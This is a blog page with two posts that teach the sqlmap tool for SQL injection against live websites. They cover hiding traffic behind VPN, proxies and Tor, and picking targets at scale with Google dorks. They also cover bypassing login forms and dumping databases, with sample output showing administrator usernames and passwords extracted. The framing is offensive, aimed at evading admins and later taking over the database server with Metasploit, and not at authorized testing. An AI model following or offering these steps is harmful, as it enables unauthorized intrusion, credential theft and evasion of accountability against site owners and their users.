Showing posts with label SQL INJECTION. Show all posts
Showing posts with label SQL INJECTION. Show all posts

Wednesday, 4 January 2012

SQLMAP Volume 2: TIPS & TRICKS

1) You need to be safe, so this is crucial. I assume you already have a trusted VPN connected and now to be extra ninja we are also going to route traffic through proxies. We can accomplish this by simply setting the '--proxy=PROXY' parameter which will enable use of proxies during scanning.
         EX: sqlmap.py -u http://site.com/example.php?id=1 --proxy=http://proxysite.com:PORT
         You can also supply credentials with the '--proxy-cred=user:pass' argument

2) You can speed scans by increasing the THREAD count, since the default is set to 3 request at a time.
         2a) If you set this beyond the default you may want to also set the '--delay=DELAY'
         parameter to allow some  strategic delays between requests (or to speed up
        even further, although I have a feeling this leads to errors  which other tools are prone to
        (cough..Havij)
         2b) You can use the '-o' switch to enable all of the optimiZation features at once
         2c) If you are performing time based attacks or blind injections then it may be a better
         idea to leave thread count alone and use the '--predict-output' argumernt
         which will save you a bit of time and will allow SQLMAP to perform some analysis
         on found results in session file to help speed things up (can slow things down in other
         scenarios where the '-o' option is much better choice.
        
3) You can have the tool load different USER-AGENTS in case a site or page has restrictions based on browser type. This can be accomplished by adding the '-a <insert/path/to/file>' parameter to your command string. It needs to be followed by the path to the file containing the USER-AGENTs to be used. You can run a few searches on Google to find some common ones or how to come up with your own custom USER-AGENT. NOTE: this may have been replaced by --user-agent=<insert user agent details> with latest update
         3a) there is a default list provided with installation that you can add to or see how they
        are modeled located at: '~\sqlmap\txt\user-agent.txt'
         *3b) you can also just let SQLMAP do the deciding by issuing the '--random-agent'
        
4) If you need to fake out the referer in the request due to restrictions on server side you can change the default values by using the '--referer=<http://www.insert/REFERER/page/.com/%3E'
          
5) Need credentials to perform a more in depth scan? No problem! We can set the credentials using the '--auth-cred' followed by credentials in the typical 'user'':''pass' format
          EX: --auth-cred=user:password  or  --auth-cred=admin:IhazYourPazword!
          
6) You can load targets using GOOGLE and DORKS, by using the '-g' argument followed by the search dork in quotes ""
          EX: sqlmap.py -g "inurl:index.php?id= site:us"
          NOTE: It will work on any targets found in an interactive manner but only the
          arguments passes with original command will be used on each target so make sure you
          use some basics but not too much.

          EX: sqlmap.py -g "inurl:index.php?id=" -b --current-user --current-db --is-dba --dbs
          6a) You can also process more than one site request at a time from a file by changing
          the standard '-u' to '-r <path/to/load/HTTP/requests/from/>'
         
7) You can save and resume scans and data retrieved in session file (in "output" folder) to save time, or to pick things back up where you last left off. You need to use the '-s <insert/path/to/session/file>/session' parameter to tell it where to look to parse results from.
          NOTE: Point it directly at the session file and not just the folder it is in or it
          wont load properly.
You can also use the recorded scan details to learn a LOT. It contains info on the queries used to get all the details as well as everything found, so it is a good reference and learning tool (all dumps are converted to .CSV files which are above and beyond the log and session files that are saved).

8) You can use the '--eta' paramter to have the scans keep an ETA so you have an idea of how long things are going to take. This come in handy when doing dumps of database to give you an idea of how long it thinks it will take (very useful when blind or trying to make determination as to whether or not it makes sense to dump a questionable table in full or just what you need. Remember if it looks like it will take too long you can use the '-s' argument to pick it back up later See step 7 above)

9) You can use '--flush-session' to clear out the results stored for a session file if you need to just start over, or in case the admin has come along and made some changes since your last visit ;)

10) The last one I will leave you with is very important if you are working on Linux machine, like Backtrack, to make sure you have the latest version of SQLMAP as it is constantly being worked on and new developments constantly being released. This can be accomplished by a quick addition of the '--update' argument.
           EX: sqlmap.py --update
           NOTE: if you are working on Windows then you can either check the SQLMAP
           homepage often for updated version to download or you can try the Windows SVN
           client called TortoiseSVN GUI, and can be found here and is available for both 32
           and 64 bit computers: http://tortoisesvn.net/
                     You just download and install, then navigate to the SQLMAP install folder in
                     Windows Explorer and you will now have green icon next to those folders
                     that can be updated by SVN. Just right click and choose the option to
                     SVN UPdate folder contents. Once it is done you have updated copy.
          
BONUS Material:
1) When attacking version 4 databases with no information schema to rely on there are still several options with SQLMAP:
          1a) You can use the '--common-tables' and '--common-columns' arguments to try and bruteforce the table and column names. The default list is much greater than Havij and other tools and can easily be added to if you want to beef it up, it as well as many others used can be found at: ~\sqlmap\txt\*.txt

2) If you dont get any positive results from injection but you have a gut fealing that the site is vulnerable then you can try increasing the '--level' or '--risk' arguments beyond the default level of 1. When you do this it will allow SQLMAP to perform more intense attacks and check for additional injection points such as the cookie field, user-agent field, and even the referer field. I typically will add '--level 3 --risk 3' to my command string if I dont get what I am looking for and have a strong feeling there is an injection point that is some how being overlooked.
3-X)=Updates recently introduced:
' --batch' allows you to walk away from the terminal and let SQLMAP make all of the decisions on your behalf fro all instances where it would usually prompt for interaction, a true hands free experience
' --schema' which can be used to enumeate the databases or schema
' --parse-errors' which tells SQLMAP to parse the error messages from response pages received from queries - helpful when using google dorks
' --mobile' which like the user-agent argument allows SQLMAP to act as if it was a mobile device, which can be handy in testing many of the new mobile.site.com spin-off domains to help reach ever expanding consumer markets with very little concern for security or sanitization :)
 Last, but certainly not least as this can be very helpful in adding to YOUR security:
' --tor' which enables SQLMAP to perform queries through the default TOR proxy setup address

Mini-Tutorial on the: --forms
So you want to inject a search form or try to bypass basic login page (with the typically two input fields such as user and pass), you can either pass to sqlmap the request in a request file (-r) as noted aboved, or you can set the $POST data accordingly using the '--data' argument,...
...or let SQLMAP do it for you!
Both user and pass from above example, as do others in real life, appear as <form> and <input> tags in HTML code. This is where this switch will get to perform its handy work. Provide SQLMAP with '--forms' as well as the page where the form can be found as the target url '-u' and SQLMAP will do the rest, by parsing the forms it has found on page provided and will interactively guide you through to test for SQL injection on the form input fields (rather than performing a normal injection scan on site provided by '-u').

Hope these help you with the tool SQLMAP a little bit more. Still working on adding some more instructions and tutorials regarding the additional features that interact with the filesystem, system registry, and actual command execution with a little help from Metasploit. I am also planning a separate short article on how to perform injections via $POST :)

Until next time...

SQLMAP Basic Introduction and Tutorial

There are times when manual efforts just wont work or you plain dont have the skills and other famous tools like Havij dont seem to do the trick either. I experienced one of these times recently and it lead me to another great tool that just doesn't seem to be as popular - SQLMAP. I had a site the other day I was working on my injections with and could not get it manually due to poor skills at timing things, reading results, and PATIENCE. Havij was cracking out due to timing method sucking and I dont have skills to do it manually (props to those that can), so here is a tutorial I put together on how to go about cracking this thing wide open using the less commonly known tool SQLMAP. Let me first start by saying if you are afraid of the command line then just leave now because there is no GUI for this and I dont think there ever will be. If you really want to hack you need to get familiar with it so why not start now. Let's begin...

There is no need to waste time with $hitcash and other download sites. For a stable and virus free copy just get from the official site here: http://sqlmap.sourceforge.net/
             Direct to Download Page: http://sourceforge.net/projects/sqlmap/files/sqlmap/ 

You will simply extract this to the desired folder you want to run and use it from. As mentioned this is a command line tool, NO GUI. If you want to add it to your path variable so you can run it from anywhere the command prompt opens by following these simple steps:

 1) Right click on Computer and choose Properties option
 2) In the System window click on Advanced system settings in the left pane
 3) In the System Properties window select Advanced tab and click on Environment Variables
 4) In the Environment Variables window you will notice two columns User variables for a username and System  variables - we need the user variable to the PATH so it knows where to open the program wherever we decide to open  CMD from
 5) Now to add a PATH to the User variable, highlight PATH and click on New… button. In the New User Variable dialog  box type the Variable name and Variable value and click OK button. If you are unsure you can choose to edit the  PATH variable to see how it is done (IF YOU CHANGE THIS YOU MAY HAVE PROBLEMS, SO BE CAREFULL, now just add path to  sqlmap.exe to the end and your done, hit OK and save.
     5a) To remove a User variable click on the required User variable and then click on Delete button
     5b) To edit a User variable click on Edit… button. In the Edit User Variable dialog box
     edit the Variable name and Variable value and click OK button

NOTE: you can skip the path variable part if you want but then you must be in the folder to run it from command line (I am lazy and dont like to navigate so I like to set it and forget it)

OK now you should be ready to get started...open the command prompt and type sqlmap or sqlmap.exe to see if you set the path variable correctly. If you get "error: missing a mandatory parameter..." then you are in business. To begin I suggest opening two command prompts at the same time and put them side by side (it will help make this easier to visualize and learn while we go through this tutorial). On one side you need to simply type in 'sqlmap --help' and see what follows, you will quickly see sqlmap has a LOT of options available for you to choose from. I will cover some of the basics to help get you started. Keep the help menu open on one side and now we will begin working from the other side.

I will assume you have done your own searching on the web to find some vulnerable targets, so let's get started testing them. we will use the '-u' option to define our target site, like this:

EX: sqlmap -u http://site.com/example.php?id=1

Results...PHP 5.2.14, Apache 2.2.17, MySQL 5
this will perform a basic run at the target to test for injection, simply providing basic overview info. We can use the '-f' parameter to get some more specific information from our target, like this:

EX: sqlmap -u http://site.com/example.php?id=1 -f

Results are not too much more than previous (you get column count or vulnerable column if you pay close attention to info retrieved as well as specifics on version). The results will also be stored for the entire session in the 'output' folder wherever sqlmap is physically installed - it also shows the commands used to get the info. That doesnt really tell us a lot so lets grab the site banner to see what it can tell us as well as some other useful info from the Database itself by changing up the command and adding a few more paramaters, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs
Results:

NOTE: it seems to process them in the order you pass the arguments, so if it fails along the way you dont get the rest. For this reason I usually start with the above command and then start to change from there to get more info...

-f = Back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
              comment injection fingerprint: MySQL 5.1.00
              banner parsing fingerprint: MySQL 5.0.92
-b = banner:    '5.0.92-community'
--current-user  =  read from file 'C:\sqlmap-0.8_exe\output\site.com\session': user@localhost
--current-db = same as above, reads from session file created for scan but shows current database
--is-dba = same as above, reads from session file created for scan but shows if current user is DBA: 'TRUE' or 'False'
--users = same as above, reads from session file created for scan but shows  number of database users and usernames
--dbs = same as above, reads from session file created for scan but shows ALL of the databases available, not just current
 current user:    'user@localhost'
 current database: database1
 system users [1]: 'user'@'localhost'
 current user is DBA:    'False'
 vailable databases [5]:
 [*] information_schema
 [*] database1
 [*] database2
 [*] database3
 [*] database4

This pretty much gets you set up with the basic info, you can go a step further and add the '--passwords' to the end of the command to try and extract the users passwords fro database users if they are available. This is not always effective though (i.e. no MySQL table) which is why it is best to add after the basics or at the end of your recon session, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs --passwords

OR by itself following our recon command like this:

EX: sqlmap -u http://site.com/example.php?id=1 --passwords

You can also check user priveleges '--priveleges' to check user priveleges as well as roles '--role'..., but what if you want to dig deeper into the Database(s) to find more info, no problem....let's keep going and extract all of the table names and columns...

Now we need to keep it simple and just request what we need using these new parameters: '--tables', '--columns', and '-D', like this:

EX: sqlmap -u http://site.com/example.php?id=1 --tables -D database1

Results....it will load all of the results into the log file stored in the "output" folder wherever you installed sqlmap physically on your system, while it also prints the results to the screen.

The results would look something like this:
[16:10:05] [INFO] fetching tables for database 'database1'
[16:10:05] [INFO] fetching number of tables for database 'database1'
[16:10:05] [INFO] retrieved: 13
[16:10:16] [INFO] retrieved: access
[16:10:53] [INFO] retrieved: action
[16:11:40] [INFO] retrieved: ad
[16:11:55] [INFO] retrieved: adcriteria
[16:13:02] [INFO] retrieved: adminhelp
[16:13:56] [INFO] retrieved: administrator
[16:15:14] [INFO] retrieved: adminlog
[16:16:00] [INFO] retrieved: adminmessage
[16:17:26] [INFO] retrieved: bbcode
[16:18:26] [INFO] retrieved: config
[16:19:26] [INFO] retrieved: db_users
[16:20:26] [INFO] retrieved: users
[16:21:26] [INFO] retrieved: etc
Database: database1
[13 tables]
+-----------------+
| access              |
| action              |
| ad                    |
| adcriteria         |
| adminhelp        |
| administrator   |
| adminlog          |
| adminmessage |
| bbcode             |
| config              |
| db_users          |
| users                |
| etc                   |
+-----------------+
....and so on until it is done finding all of the tables for the database you specified with the '-D database1' paramater earlier...and now we find the columns for the tables found above...

EX: sqlmap -u http://site.com/example.php?id=1 --columns -D database1 -T administrator

Results....remember you can check your logs in "output" folder...The results would look something like this:
[16:30:05] [INFO] fetching columns for table 'administrator' on database 'database1'
[16:33:05] [INFO] fetching number of columns for table 'administrator' on database 'database1'
[16:36:05] [INFO] retrieved: 3
[16:39:16] [INFO] retrieved: user
[16:45:53] [INFO] retrieved: pass
[16:46:40] [INFO] retrieved: id
[16:49:26] [INFO] retrieved: etc
Database: database1
Table: administrator
[3 Columns]
+-----------+----------------+
| Column    |     Type         |
+-----------+----------------+
| user         | varchar(250) |
| pass         | varchar(250) |
| ID            | int(11)           |
| etc           | varchar(100) |
+-----------+----------------+
....and so it goes on until it is done finding all of the columns and tables for the database you specified with the '-D database1 -T administrator' paramaters earlier...BUT no you may be asking yourself how do we get that precious data out of there?

Like this:
EX: sqlmap -u http://site.com/example.php?id=1 --dump -D database1 -T administrator -C user,pass,id

Results....remember you can check your logs in "output" folder...The results would look something like this:
[18:51:57] [INFO] fetching columns 'user, pass, id' entries for table
 'administrator' on database 'database1'
[18:51:57] [INFO] fetching number of columns 'user, pass, id' entries for table 'administrator' on database 'database1'
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 1
[18:51:57] [INFO] retrieved: IhazYOURpassWZORD
[18:52:52] [INFO] retrieved: admin
[18:53:34] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:53:34] [INFO] retrieved: IhazYOURpassWZORDtoo
[18:54:34] [INFO] retrieved: JohnDoe
Database: database1
Table: administrators
[2 entries]
+-----+---------------------------------+------------+
|   ID  |                Password              |     user      |
+-----+---------------------------------+------------+
| 1      |  IhazYOURpassWORD      |    admin    |
| 2      | IhazYOURpassWORDtoo  | JohnDoe   |
+-----+---------------------------------+------------+
[18:55:14] [INFO] Table 'database1.administrator' dumped to CSV file 'C:\sqlmap-0.8_e
xe\output\www.site.com\dump\database1\administrator.csv'
[18:55:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.8_exe\out
put\www.site.com'
That sums up our basic introduction to SQLMAP. Ideas for next series...SQLMAP Round 2: From Dumping to Owning the DB Server. Using ninja skills with sqlmap to interact with the system registry and filesystem access, as well as gaining access to the underlying operating system and executing system commands with a little assistance from the incorporation of Metasploit to the attack scenario. I hope you enjoyed this episode and stay tuned for more to come in the next series...